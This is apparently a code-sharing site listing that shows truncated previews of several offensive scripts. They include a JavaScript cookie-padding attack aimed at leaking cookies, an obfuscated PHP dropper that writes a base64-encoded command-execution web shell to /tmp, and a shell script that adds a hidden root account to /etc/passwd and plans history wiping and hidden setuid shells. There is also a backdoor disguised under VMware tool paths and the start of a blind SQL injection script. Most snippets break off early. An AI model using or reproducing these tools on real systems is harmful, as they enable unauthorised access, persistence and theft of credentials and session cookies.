This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(function(d){ | |
desired_length = 8192; | |
for(cookie_val = '=';cookie_val.length<=97;cookie_val+="A"){}; | |
for(i=100;(desired_length-d.cookie.length)>111;i++,d.cookie=i+cookie_val){}; | |
for(cookie_val="999=";(cookie_val.length + d.cookie.length + 9) <= desired_length;cookie_val += "A"){}; | |
d.cookie = cookie_val; | |
d.cookie = "888=8"; | |
x = new XMLHttpRequest(); | |
x.onreadystatechange = function(){ | |
if (x.readyState == 4 && x.status == 400){ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?PHP | |
$b = 'bas'.'e64'.'_de'.'code'; | |
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# TODO | |
# copy binarys to new location, execute from said location. ensure ps command filters out commands | |
#PORT="1337" | |
# Add users, cat ssh key for ssh key access, clear history, copy shells with sguid bit set to hidden files for later use | |
deluser news > /dev/null 2>&1 | |
deluser list > /dev/null 2>&1 | |
sed '7ilist:x:0:0:list,,,,:/:/bin/bash' /etc/passwd > /tmp/out.txt && cat /tmp/out.txt > /etc/passwd && rm /tmp/out.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# vmware backdoor if the dir don’t exist (which it should) create it anyway | |
mkdir -p /usr/lib/vmware-tools/bin32 | |
vmwarestamp="`ls -l /usr/bin/lsof 2>log.error | awk {'print $6'}`" | |
echo $vmwarestamp | |
touch ./vmware-vnet1 | |
chmod 755 ./vmware-vnet1 | |
read -d '' vmware <<"BLOCK" | |
#!/bin/bash |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
##NOT FINISHED## | |
## ©mastahyeti 2011## | |
import urllib2 | |
import urllib | |
import time | |
import math | |
CHARSET = [chr(x) for x in xrange(32,39)] + [chr(x) for x in xrange(40,127)] #everything but ' | |
CHARSET_LEN = len(CHARSET) |
NewerOlder